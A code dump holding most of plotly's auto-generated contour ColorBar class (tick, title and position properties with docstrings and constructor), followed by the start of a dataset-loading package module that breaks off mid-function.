turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["tickcolor"]
@tickcolor.setter
def tickcolor(self, val):
self["tickcolor"] = val
# tickfont
# --------
@property
def tickfont(self):
"""
Sets the color bar's tick label font
The 'tickfont' property is an instance of Tickfont
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.Tickfont`
- A dict of string/value properties that will be passed
to the Tickfont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.contour.colorbar.Tickfont
"""
return self["tickfont"]
@tickfont.setter
def tickfont(self, val):
self["tickfont"] = val
# tickformat
# ----------
@property
def tickformat(self):
"""
Sets the tick label formatting rule using d3 formatting mini-
languages which are very similar to those in Python. For
numbers, see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format And for dates
see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format We add one item
to d3's date formatter: "%{n}f" for fractional seconds with n
digits. For example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display "09~15~23.46"
The 'tickformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["tickformat"]
@tickformat.setter
def tickformat(self, val):
self["tickformat"] = val
# tickformatstops
# ---------------
@property
def tickformatstops(self):
"""
The 'tickformatstops' property is a tuple of instances of
Tickformatstop that may be specified as:
- A list or tuple of instances of plotly.graph_objs.contour.colorbar.Tickformatstop
- A list or tuple of dicts of string/value properties that
will be passed to the Tickformatstop constructor
Supported dict properties:
dtickrange
range [*min*, *max*], where "min", "max" -
dtick values which describe some zoom level, it
is possible to omit "min" or "max" value by
passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level,
the same as "tickformat"
Returns
-------
tuple[plotly.graph_objs.contour.colorbar.Tickformatstop]
"""
return self["tickformatstops"]
@tickformatstops.setter
def tickformatstops(self, val):
self["tickformatstops"] = val
# tickformatstopdefaults
# ----------------------
@property
def tickformatstopdefaults(self):
"""
When used in a template (as
layout.template.data.contour.colorbar.tickformatstopdefaults),
sets the default property values to use for elements of
contour.colorbar.tickformatstops
The 'tickformatstopdefaults' property is an instance of Tickformatstop
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.Tickformatstop`
- A dict of string/value properties that will be passed
to the Tickformatstop constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.contour.colorbar.Tickformatstop
"""
return self["tickformatstopdefaults"]
@tickformatstopdefaults.setter
def tickformatstopdefaults(self, val):
self["tickformatstopdefaults"] = val
# ticklen
# -------
@property
def ticklen(self):
"""
Sets the tick length (in px).
The 'ticklen' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["ticklen"]
@ticklen.setter
def ticklen(self, val):
self["ticklen"] = val
# tickmode
# --------
@property
def tickmode(self):
"""
Sets the tick mode for this axis. If "auto", the number of
ticks is set via `nticks`. If "linear", the placement of the
ticks is determined by a starting position `tick0` and a tick
step `dtick` ("linear" is the default value if `tick0` and
`dtick` are provided). If "array", the placement of the ticks
is set via `tickvals` and the tick text is `ticktext`. ("array"
is the default value if `tickvals` is provided).
The 'tickmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['auto', 'linear', 'array']
Returns
-------
Any
"""
return self["tickmode"]
@tickmode.setter
def tickmode(self, val):
self["tickmode"] = val
# tickprefix
# ----------
@property
def tickprefix(self):
"""
Sets a tick label prefix.
The 'tickprefix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["tickprefix"]
@tickprefix.setter
def tickprefix(self, val):
self["tickprefix"] = val
# ticks
# -----
@property
def ticks(self):
"""
Determines whether ticks are drawn or not. If "", this axis'
ticks are not drawn. If "outside" ("inside"), this axis' are
drawn outside (inside) the axis lines.
The 'ticks' property is an enumeration that may be specified as:
- One of the following enumeration values:
['outside', 'inside', '']
Returns
-------
Any
"""
return self["ticks"]
@ticks.setter
def ticks(self, val):
self["ticks"] = val
# ticksuffix
# ----------
@property
def ticksuffix(self):
"""
Sets a tick label suffix.
The 'ticksuffix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["ticksuffix"]
@ticksuffix.setter
def ticksuffix(self, val):
self["ticksuffix"] = val
# ticktext
# --------
@property
def ticktext(self):
"""
Sets the text displayed at the ticks position via `tickvals`.
Only has an effect if `tickmode` is set to "array". Used with
`tickvals`.
The 'ticktext' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["ticktext"]
@ticktext.setter
def ticktext(self, val):
self["ticktext"] = val
# ticktextsrc
# -----------
@property
def ticktextsrc(self):
"""
Sets the source reference on Chart Studio Cloud for ticktext .
The 'ticktextsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["ticktextsrc"]
@ticktextsrc.setter
def ticktextsrc(self, val):
self["ticktextsrc"] = val
# tickvals
# --------
@property
def tickvals(self):
"""
Sets the values at which ticks on this axis appear. Only has an
effect if `tickmode` is set to "array". Used with `ticktext`.
The 'tickvals' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["tickvals"]
@tickvals.setter
def tickvals(self, val):
self["tickvals"] = val
# tickvalssrc
# -----------
@property
def tickvalssrc(self):
"""
Sets the source reference on Chart Studio Cloud for tickvals .
The 'tickvalssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["tickvalssrc"]
@tickvalssrc.setter
def tickvalssrc(self, val):
self["tickvalssrc"] = val
# tickwidth
# ---------
@property
def tickwidth(self):
"""
Sets the tick width (in px).
The 'tickwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["tickwidth"]
@tickwidth.setter
def tickwidth(self, val):
self["tickwidth"] = val
# title
# -----
@property
def title(self):
"""
The 'title' property is an instance of Title
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.Title`
- A dict of string/value properties that will be passed
to the Title constructor
Supported dict properties:
font
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
side
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
text
Sets the title of the color bar. Note that
before the existence of `title.text`, the
title's contents used to be defined as the
`title` attribute itself. This behavior has
been deprecated.
Returns
-------
plotly.graph_objs.contour.colorbar.Title
"""
return self["title"]
@title.setter
def title(self, val):
self["title"] = val
# titlefont
# ---------
@property
def titlefont(self):
"""
Deprecated: Please use contour.colorbar.title.font instead.
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.contour.colorbar.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
"""
return self["titlefont"]
@titlefont.setter
def titlefont(self, val):
self["titlefont"] = val
# titleside
# ---------
@property
def titleside(self):
"""
Deprecated: Please use contour.colorbar.title.side instead.
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
"""
return self["titleside"]
@titleside.setter
def titleside(self, val):
self["titleside"] = val
# x
# -
@property
def x(self):
"""
Sets the x position of the color bar (in plot fraction).
The 'x' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# xanchor
# -------
@property
def xanchor(self):
"""
Sets this color bar's horizontal position anchor. This anchor
binds the `x` position to the "left", "center" or "right" of
the color bar.
The 'xanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'center', 'right']
Returns
-------
Any
"""
return self["xanchor"]
@xanchor.setter
def xanchor(self, val):
self["xanchor"] = val
# xpad
# ----
@property
def xpad(self):
"""
Sets the amount of padding (in px) along the x direction.
The 'xpad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["xpad"]
@xpad.setter
def xpad(self, val):
self["xpad"] = val
# y
# -
@property
def y(self):
"""
Sets the y position of the color bar (in plot fraction).
The 'y' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# yanchor
# -------
@property
def yanchor(self):
"""
Sets this color bar's vertical position anchor This anchor
binds the `y` position to the "top", "middle" or "bottom" of
the color bar.
The 'yanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'middle', 'bottom']
Returns
-------
Any
"""
return self["yanchor"]
@yanchor.setter
def yanchor(self, val):
self["yanchor"] = val
# ypad
# ----
@property
def ypad(self):
"""
Sets the amount of padding (in px) along the y direction.
The 'ypad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["ypad"]
@ypad.setter
def ypad(self, val):
self["ypad"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
units of plot "fraction" or in *pixels. Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
a suffix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format And for
dates see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format We add
one item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
A tuple of :class:`plotly.graph_objects.contour.colorba
r.Tickformatstop` instances or dicts with compatible
properties
tickformatstopdefaults
When used in a template (as layout.template.data.contou
r.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
contour.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
this axis' are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on Chart Studio Cloud for
ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on Chart Studio Cloud for
tickvals .
tickwidth
Sets the tick width (in px).
title
:class:`plotly.graph_objects.contour.colorbar.Title`
instance or dict with compatible properties
titlefont
Deprecated: Please use contour.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use contour.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
"""
_mapped_properties = {
"titlefont": ("title", "font"),
"titleside": ("title", "side"),
}
def __init__(
self,
arg=None,
bgcolor=None,
bordercolor=None,
borderwidth=None,
dtick=None,
exponentformat=None,
len=None,
lenmode=None,
nticks=None,
outlinecolor=None,
outlinewidth=None,
separatethousands=None,
showexponent=None,
showticklabels=None,
showtickprefix=None,
showticksuffix=None,
thickness=None,
thicknessmode=None,
tick0=None,
tickangle=None,
tickcolor=None,
tickfont=None,
tickformat=None,
tickformatstops=None,
tickformatstopdefaults=None,
ticklen=None,
tickmode=None,
tickprefix=None,
ticks=None,
ticksuffix=None,
ticktext=None,
ticktextsrc=None,
tickvals=None,
tickvalssrc=None,
tickwidth=None,
title=None,
titlefont=None,
titleside=None,
x=None,
xanchor=None,
xpad=None,
y=None,
yanchor=None,
ypad=None,
**kwargs
):
"""
Construct a new ColorBar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.contour.ColorBar`
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
units of plot "fraction" or in *pixels. Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
a suffix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format And for
dates see: https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format We add
one item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
A tuple of :class:`plotly.graph_objects.contour.colorba
r.Tickformatstop` instances or dicts with compatible
properties
tickformatstopdefaults
When used in a template (as layout.template.data.contou
r.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
contour.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
this axis' are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on Chart Studio Cloud for
ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on Chart Studio Cloud for
tickvals .
tickwidth
Sets the tick width (in px).
title
:class:`plotly.graph_objects.contour.colorbar.Title`
instance or dict with compatible properties
titlefont
Deprecated: Please use contour.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use contour.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
ColorBar
"""
super(ColorBar, self).__init__("colorbar")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.contour.ColorBar
constructor must be a dict or
an instance of :class:`plotly.graph_objs.contour.ColorBar`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("bgcolor", None)
_v = bgcolor if bgcolor is not None else _v
if _v is not None:
self["bgcolor"] = _v
_v = arg.pop("bordercolor", None)
_v = bordercolor if bordercolor is not None else _v
if _v is not None:
self["bordercolor"] = _v
_v = arg.pop("borderwidth", None)
_v = borderwidth if borderwidth is not None else _v
if _v is not None:
self["borderwidth"] = _v
_v = arg.pop("dtick", None)
_v = dtick if dtick is not None else _v
if _v is not None:
self["dtick"] = _v
_v = arg.pop("exponentformat", None)
_v = exponentformat if exponentformat is not None else _v
if _v is not None:
self["exponentformat"] = _v
_v = arg.pop("len", None)
_v = len if len is not None else _v
if _v is not None:
self["len"] = _v
_v = arg.pop("lenmode", None)
_v = lenmode if lenmode is not None else _v
if _v is not None:
self["lenmode"] = _v
_v = arg.pop("nticks", None)
_v = nticks if nticks is not None else _v
if _v is not None:
self["nticks"] = _v
_v = arg.pop("outlinecolor", None)
_v = outlinecolor if outlinecolor is not None else _v
if _v is not None:
self["outlinecolor"] = _v
_v = arg.pop("outlinewidth", None)
_v = outlinewidth if outlinewidth is not None else _v
if _v is not None:
self["outlinewidth"] = _v
_v = arg.pop("separatethousands", None)
_v = separatethousands if separatethousands is not None else _v
if _v is not None:
self["separatethousands"] = _v
_v = arg.pop("showexponent", None)
_v = showexponent if showexponent is not None else _v
if _v is not None:
self["showexponent"] = _v
_v = arg.pop("showticklabels", None)
_v = showticklabels if showticklabels is not None else _v
if _v is not None:
self["showticklabels"] = _v
_v = arg.pop("showtickprefix", None)
_v = showtickprefix if showtickprefix is not None else _v
if _v is not None:
self["showtickprefix"] = _v
_v = arg.pop("showticksuffix", None)
_v = showticksuffix if showticksuffix is not None else _v
if _v is not None:
self["showticksuffix"] = _v
_v = arg.pop("thickness", None)
_v = thickness if thickness is not None else _v
if _v is not None:
self["thickness"] = _v
_v = arg.pop("thicknessmode", None)
_v = thicknessmode if thicknessmode is not None else _v
if _v is not None:
self["thicknessmode"] = _v
_v = arg.pop("tick0", None)
_v = tick0 if tick0 is not None else _v
if _v is not None:
self["tick0"] = _v
_v = arg.pop("tickangle", None)
_v = tickangle if tickangle is not None else _v
if _v is not None:
self["tickangle"] = _v
_v = arg.pop("tickcolor", None)
_v = tickcolor if tickcolor is not None else _v
if _v is not None:
self["tickcolor"] = _v
_v = arg.pop("tickfont", None)
_v = tickfont if tickfont is not None else _v
if _v is not None:
self["tickfont"] = _v
_v = arg.pop("tickformat", None)
_v = tickformat if tickformat is not None else _v
if _v is not None:
self["tickformat"] = _v
_v = arg.pop("tickformatstops", None)
_v = tickformatstops if tickformatstops is not None else _v
if _v is not None:
self["tickformatstops"] = _v
_v = arg.pop("tickformatstopdefaults", None)
_v = tickformatstopdefaults if tickformatstopdefaults is not None else _v
if _v is not None:
self["tickformatstopdefaults"] = _v
_v = arg.pop("ticklen", None)
_v = ticklen if ticklen is not None else _v
if _v is not None:
self["ticklen"] = _v
_v = arg.pop("tickmode", None)
_v = tickmode if tickmode is not None else _v
if _v is not None:
self["tickmode"] = _v
_v = arg.pop("tickprefix", None)
_v = tickprefix if tickprefix is not None else _v
if _v is not None:
self["tickprefix"] = _v
_v = arg.pop("ticks", None)
_v = ticks if ticks is not None else _v
if _v is not None:
self["ticks"] = _v
_v = arg.pop("ticksuffix", None)
_v = ticksuffix if ticksuffix is not None else _v
if _v is not None:
self["ticksuffix"] = _v
_v = arg.pop("ticktext", None)
_v = ticktext if ticktext is not None else _v
if _v is not None:
self["ticktext"] = _v
_v = arg.pop("ticktextsrc", None)
_v = ticktextsrc if ticktextsrc is not None else _v
if _v is not None:
self["ticktextsrc"] = _v
_v = arg.pop("tickvals", None)
_v = tickvals if tickvals is not None else _v
if _v is not None:
self["tickvals"] = _v
_v = arg.pop("tickvalssrc", None)
_v = tickvalssrc if tickvalssrc is not None else _v
if _v is not None:
self["tickvalssrc"] = _v
_v = arg.pop("tickwidth", None)
_v = tickwidth if tickwidth is not None else _v
if _v is not None:
self["tickwidth"] = _v
_v = arg.pop("title", None)
_v = title if title is not None else _v
if _v is not None:
self["title"] = _v
_v = arg.pop("titlefont", None)
_v = titlefont if titlefont is not None else _v
if _v is not None:
self["titlefont"] = _v
_v = arg.pop("titleside", None)
_v = titleside if titleside is not None else _v
if _v is not None:
self["titleside"] = _v
_v = arg.pop("x", None)
_v = x if x is not None else _v
if _v is not None:
self["x"] = _v
_v = arg.pop("xanchor", None)
_v = xanchor if xanchor is not None else _v
if _v is not None:
self["xanchor"] = _v
_v = arg.pop("xpad", None)
_v = xpad if xpad is not None else _v
if _v is not None:
self["xpad"] = _v
_v = arg.pop("y", None)
_v = y if y is not None else _v
if _v is not None:
self["y"] = _v
_v = arg.pop("yanchor", None)
_v = yanchor if yanchor is not None else _v
if _v is not None:
self["yanchor"] = _v
_v = arg.pop("ypad", None)
_v = ypad if ypad is not None else _v
if _v is not None:
self["ypad"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
py | 1a4fbfc4d6435831acbcdf35d8c72f7a4d433142 | """This package includes all the modules related to data loading and preprocessing
To add a custom dataset class called 'dummy', you need to add a file called 'dummy_dataset.py' and define a subclass 'DummyDataset' inherited from BaseDataset.
You need to implement four functions:
-- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).
-- <__len__>: return the size of dataset.
-- <__getitem__>: get a data point from data loader.
-- <modify_commandline_options>: (optionally) add dataset-specific options and set default options.
Now you can use the dataset class by specifying flag '--dataset_mode dummy'.
See our template dataset class 'template_dataset.py' for more details.
"""
import importlib
import torch.utils.data
from data.base_dataset import BaseDataset
from data.base3D_dataset import BaseDataset3D
def find_dataset_using_name(dataset_name):
"""Import the module "data/[dataset_name]_dataset.py".
In the file, the class called DatasetNameDataset() will
be instantiated. It has to be a subclass of BaseDataset,
and it is case-insensitive.
"""
dataset_filename = "data." + dataset_name + "_dataset"
datasetlib = importlib.import_module(dataset_filename)
dataset = None
target_dataset_name = dataset_name.replace('_', '') + 'dataset'
for name, cls in datasetlib.__dict__.items():
if name.lower() == target_dataset_name.lower() \
and (issubclass(cls, BaseDataset) or issubclass(cls, BaseDataset3D)):
dataset = cls
if dataset is None:
raise NotImplementedError("In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase." % (dataset_filename, target_dataset_name))
return dataset
def get_option_setter(dataset_name):
